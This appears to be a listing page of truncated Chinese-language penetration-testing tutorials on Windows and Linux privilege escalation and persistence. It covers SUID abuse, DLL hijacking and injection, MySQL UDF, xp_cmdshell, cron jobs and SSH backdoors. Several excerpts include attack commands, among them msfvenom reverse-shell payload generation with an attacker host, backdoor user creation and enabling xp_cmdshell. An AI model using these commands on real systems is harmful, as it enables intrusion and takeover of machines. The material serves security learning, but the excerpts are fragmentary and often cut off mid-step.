一、操作目的和应用场景 本文档介绍在CentOS 7系统中利用带有suid权限的程序提权从而获取root shell的方法。 首先简单介绍suid的概念： Linux进程在运行的时候有以下三个UID： Real UID：执行该进程的用户的UID。Real UID只用于标识用户，不用于权限检查。 Effective UID（EUID）：进程执行时生效的UID。在对访问目标进行操作时，系统会检查EUID是否有权限。一般情况下，Real UID与EUID相同，但在运行设置了SUID权限的程序时，进程的EUID会被设置为程序文件属主的UID。 Saved UID：在高权限用户降权后...

本文介绍了如何滥用Windows上特权进程执行文件操作来实现本地特权升级（用户到管理员/系统），同时介绍了利用这些类型的错误的现有技术以及漏洞利用工具。 特权文件操作错误 高权限运行的进程会和所有进程一样对操作系统中的文件进行操作。但是当一个高权限的进程在没有足够的安全措施的情况下访问用户控制的文件或目录时，就有可能成为一个安全漏洞，因为恶意程序有可能滥用该特权进程执行的操作，做一些不该做的事情。对用户控制的资源进行特权访问很多时候都可能造成安全问题，文件只是其中一个部分。 人们熟知的例子包括修改用户可写服务可执行文件和DLL种植。如果你对特权服务将执行的文件有写权限，或...

Windows 内核漏洞提权 参考： windows-kernel-exploits 微软安全公告 渗透测试小技巧一：寻找EXP Windows 内核漏洞的关键是目标系统没有安装补丁，如何查询目标系统是否安装补丁？ 1 2 3 4 5 #查看本地系统补丁 systeminfo |findstr "KB" wmic qfe get Caption,Description,HotFixID,InstalledOn #另外两种远程查询的方式需要结合其他远程执行方式，例如 wmi...

提权技巧 1.cmd拒绝访问就自己上传一个cmd.exe，自己上传的cmd是不限制后缀的，还可以是cmd.com cmd.txt cmd.rar等 2.net user不能执行有时候是net.exe被删除了，可以先试试net1，不行就自己上传一个net.exe 3.cmd执行exp没回显的解决方法：com路径那里输入exp路径C:\RECYCLER\pr.exe，命令那里清空(包括/c )输入net user jianmei daxia /add 4.有时候因为监控而添加用户失败，试试上传抓取hash的工具，如PwDump7.exe，得到hash之后可以进...

0x00:前言     持久化后门是指当入侵者通过某种手段拿到服务器的控制权之后,通过在服务器上放置一些后门(脚本、进程、连接之类),来方便他以后持久性的入侵,简单梳理一下日常遇见windows用的比较多的一些持久化方式方便以后排查问题使用. Linux 0x01:SSH 一、ssh软连接     SSH软连接后门的原理 1、Linux软连接ssh后门需要ssh配置允许PAM认证才能使用 2、将sshd文件软连接名称设置为su,这样应用在启动...

不让我注入进程撒？加服务启动你拦截我撒？来  我用另类方法”注入”加入自启动? 众所周知,某0卫士对启动这一块做的比较严格。以往来说 大家都喜欢注册表启动，后来注册表被杀的太厉害。结果GG了。然后衍生出来服务启动?不过好景不长,服务启动也被和谐…..有反驳的可以附上你代码? (有点空手套EXP的感觉)  当然  也有服务能启动的，前提是你找到一个靠谱的白名单程序…抠鼻..我找到了…就是…不告诉你 以上是背景….目前来说  比较靠谱的一种做法是进程注入。进程注入多用于隐匿自身 以及做一些其他不可描述的事情。但…..各位程序大佬清楚 大多的 传统的...

DLL注入是一种允许攻击者在另一个进程的地址空间的上下文中运行任意代码的技术。如果进程中以过多的权限运行，那么可以会被攻击者加以利用，以便以DLL文件的形式执行恶意代码以提升权限。 手动注入 通过Metasploit的msfvenom创建DLL，该文件可以生成包含特定有效内容的DLL文件。应该注意的是，如果DLL被注入的进程是64位，那么应该使用64位有效负载。 Msfvenom - DLL生成 下一步是设置metasploit监听，以便在将恶意DLL注入进程后接受连接。 Metasploit监听配置 有许多可以执行DL...

1、 windows 补丁审计工具使用   在终端下可以使用命令systeminfo 来查看系统的一些补丁信息   http://www.demo1.com/asp.aspx 补丁检测Windows-Exploit-Suggester https://github.com/GDSSecurity/Windows-Exploit-Suggester 下载工具 git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git ...

INUX UDF提权   Linux 一般情况下的是没有权限导出 udf 到 mysql 的插件目录的，除非有特殊的情况 ， 所以今天这个教程可能对我们 linux 提权是没有起到任何有用的方面。看看就好别入戏太深。 Plugin 一般是不可以写的就算是 mysql root 权限 一般都是不行的 知道这种方法就好 得到mysql的帐号和密码 在mysql里执行 以下语句 获取插件目录 show variables like "%plugin%" 这个目录存在的条件是可写 。...

1、简介 Metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。这些功能包括智能开发，代码审计，Web应用程序扫描，社会工程。团队合作，在Metasploit和综合报告提出了他们的发现。 2、使用metasploit linux提权 生成攻击载荷 msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.134 LPORT=12345 -f raw&n...

1、 简介     FileZilla 是一个ftp服务器， 假如配置不严的，读取xml密码 可以执行一些简答的命令 默认安装目录 C:\Program Files\FileZilla Server\   2、 提权     FileZilla Server Interface.xml      <FileZillaServer>   &nb...

这篇是接着上篇内容所说。 Zend_DLL_Hijacking.exe执行远控 msfconsole 生成反弹shell 生成攻击载荷 msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.0.106  lport=12345 -f exe >/var/www/html/s.exe 本地监听 use exploit/multi/handler set payload w...

1、简介   在php里面有一个扩展是zend 这个是用解析 php zend脚本加密文件。 如果服务器安装了zend 如果ZendExtensionManager.dll权限可以修改，那就可以用其他dl替换这dll文件。 查找ZendExtensionManager.dll C:\ZkeysSoft\Zend\ZendOptimizer-3.3.3\lib               &...

1、简介   lpk劫持   在window2003 或 windowxp中 如果同一个目录中 存在 exe和 lpk.dll 每当exe执行的时候就会被劫持。利用这个特性 可以把lpk提权的文件放到权限较高的程序 ，当exe运行时，lpk.dl就可以进行提权。   2、T00ls Lpk Sethc v4   这个工具是生成lpk dll文件的工具，利用这个工具就可以生成后门文件 劫持exe 替换 setch 实现提权   3、过程 &nb...

1、简介 如果网站里面使用的数据库是sqlserver 那么如果找到sa的密码，利用提权脚本，执行命令，但是不一定的系统权限，还要看管理员开始安装sqlserver的权限设置。 2、查找帐号和密码 web.config config.asp conn.aspx database.aspx 3、开启xp_cmdshell Exec master.dbo.xp_cmdshell 'net user' Exec sp_configure'show advanced opti...

1、 简介 在mysql 可以使用自定义函数进行提权，udf = userdefined function 用户自定义函数 对于自定义的函数 在mysql5.1版本以后就需要放在插件插件目录/lib/plugin ,文件后缀微 dll，c语言编写   2、 插件目录   可以使用语句查询plugin插件目录 show variableslike "%plugin%" D:\phpStudy\MySQL\lib\plugin\   3、 使用ud...

1、简介 在winserver2008 r2 中 服务器默认是支持aspx的。所以默认都是可以执行一些命令。 如果没有进行补丁修复可以利用一些溢出提权工具,进行提权。 2、CVE-2014-4113-Exploit 这个版本的提权工具 可以对winserver2008 的系统进行溢出提权   3、实战   http://www.demo1.com/asp.aspx   systeminfo 这个命令查看系统信息的 主机名:&...

1、简介 aspx程序比asp的权限高，默认是可以执行cmd命令的。如果在asp不能执行命令的时候，如果服务器支持aspx 则上传aspx 程序到 网站上进行提权.   2、程序权限的对比 在iis里面 权限依次的大小对比 aspx->php=>asp aspx默认能执行终端命令 3、进行提权 http://www.demoasp.com/asp.aspx 密码admin 权限更大的时候还可以看到iis所有网站的帐号和密码。 ...

1、简介 window 服务器 常用的是win2003 win2008 win2012 在渗透测试中 ，我们获取的权限是iis_user用户组 ，要更高的权限就需要把当前的用 户提权到系统用户或超级管理员用户组。更高的权限方便我们在后续的渗透中，扩大 范围测试。   2、程序权限的对比   在iis里面 权限依次的大小对比 aspx->php=>asp aspx默认能执行终端命令 php和asp 如果不能执行命令，在组件没有删除的情况下，可以...

Cron Jobs 计划任务通过 /etc/crontab 文件，可以设定系统定期执行的任务。 crontab 文件只能是root权限 进行编辑 我们得到一个非root权限的远程登录用户的时候 查看/etc/crontab 内容文件   发现存在 每两分钟执行一次文件 找到 /tmp/cleanup.py   cat /tmp/cleanup.py   #!/usr/bin/env python imp...

利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限 合适用 RHEL5-RHEL6 CENTOS5-CENTOS6 均可以提权 提权方法     [moonsec@localhosttmp]$ mkdir /tmp/exploit [moonsec@localhosttmp]$ ln /bin/ping /tmp/exploit/target [moonsec@localhosttmp]$ exec 3< /tmp/exploit/target [moonsec@local...

1、简介 SUID是一种特殊的文件属性，它允许用户执行的文件以该文件的拥有者的身份运行。 SUID是一种对二进制程序进行设置的特殊权限，可以让二进制程序的执行者临时拥有属主的权限（仅对拥有执行权限的二进制程序有效）。例如，所有用户都可以执行passwd命令来修改自己的用户密码，而用户密码保存在/etc/shadow文件中。仔细查看这个文件就会发现它的默认权限是000，也就是说除了root管理员以外，所有用户都没有查看或编辑 该文件的权限。但是，在使用passwd命令时如果加上SUID特殊权限位，就可让普通用户临时获得程序所有者的身份，把变更的密码信息写入到shadow文件...

1、简介 通常我们在拥有一个webshell的时候，一般权限都是WEB容器权限，如在iis就是iis用户组权限，在apache 就是apache权限，一般都是权限较低，均可执行一些普通命令，如查看当前用户，网络信息，ip信息等。如果我想进行内网渗透就必须将权限提权到最高，如系统权限 超级管理员权限。 2、创建交互shell linux 提权 需要交互shell  可以使用工具  perl-reverse-shell.pl建立 sockets 增加运行权限 chmod +x perl-reverse-shell.pl ...

本文章适合正在学习提权的朋友，或者准备学习提权的朋友，大佬就可以绕过了，写的比较基础。我也是一个小白，总结一下提权的姿势和利用，也分享一些自己觉得好用的方法给大家，欢迎大家帮我补充，有什么好用的提权的方法也可以分享一下，大家共同进步。本篇有自己的理解，如果有什么不对的或者不好的地方希望大家不要喷我，但是欢迎帮我指正。 提权的含义： 提权，顾名思义就是提升权限，当我们getshell一个网站之后，大部分情况下我们的权限是非常低的（一般只是一个apache权限）。这时候为了“扩大战果”，就需要利用提权，来让原本的低权限（如只允许列目录）–>高权限（拥有修改文件的能力），提升一下权限...

技术介绍 我们在进行技术研究的过程中，发现有些时候sudo并不会要求我们输入密码，因为它“记得”我们。那么它为什么会“记得”我们呢？它怎么识别我们的身份呢？我们能伪造自己的身份并拿到root权限吗？ 实际上，sudo会在/var/run/sudo/ts/[username]目录中为每一位Linux用户创建一个单独的文件，这种文件中包含了身份认证成功与失败的相关信息。接下来，sudo会使用这些文件来记录所有的身份认证过程。 如何利用系统中的漏洞？ $sudo whatever [sudo]password for user:    # ...